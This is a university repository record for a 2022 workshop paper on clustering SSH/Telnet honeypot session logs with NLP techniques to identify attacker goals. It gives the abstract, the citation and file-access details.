Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.
Towards NLP-based Processing of Honeypot Logs / Boffa, Matteo; Milan, Giulia; Vassio, Luca; Drago, Idilio; Mellia, Marco; Ben Houidi, Zied. - STAMPA. - (2022), pp. 314-321. (Intervento presentato al convegno 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW) tenutosi a Genoa, Italy nel 06-10 June 2022) [10.1109/EuroSPW55150.2022.00038].
Towards NLP-based Processing of Honeypot Logs
Boffa, Matteo;Vassio, Luca;Drago, Idilio;Mellia, Marco;
2022
Abstract
Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.File | Dimensione | Formato | |
---|---|---|---|
Article_IEEE.pdf
non disponibili
Descrizione: IEEE Explorer Version
Tipologia:
2a Post-print versione editoriale / Version of Record
Licenza:
Non Pubblico - Accesso privato/ristretto
Dimensione
774.13 kB
Formato
Adobe PDF
|
774.13 kB | Adobe PDF | Visualizza/Apri Richiedi una copia |
Workshop_WTMC.pdf
accesso aperto
Descrizione: Accepted Manuscript
Tipologia:
2. Post-print / Author's Accepted Manuscript
Licenza:
PUBBLICO - Tutti i diritti riservati
Dimensione
742.69 kB
Formato
Adobe PDF
|
742.69 kB | Adobe PDF | Visualizza/Apri |
Pubblicazioni consigliate
I documenti in IRIS sono protetti da copyright e tutti i diritti sono riservati, salvo diversa indicazione.
https://hdl.handle.net/11583/2969416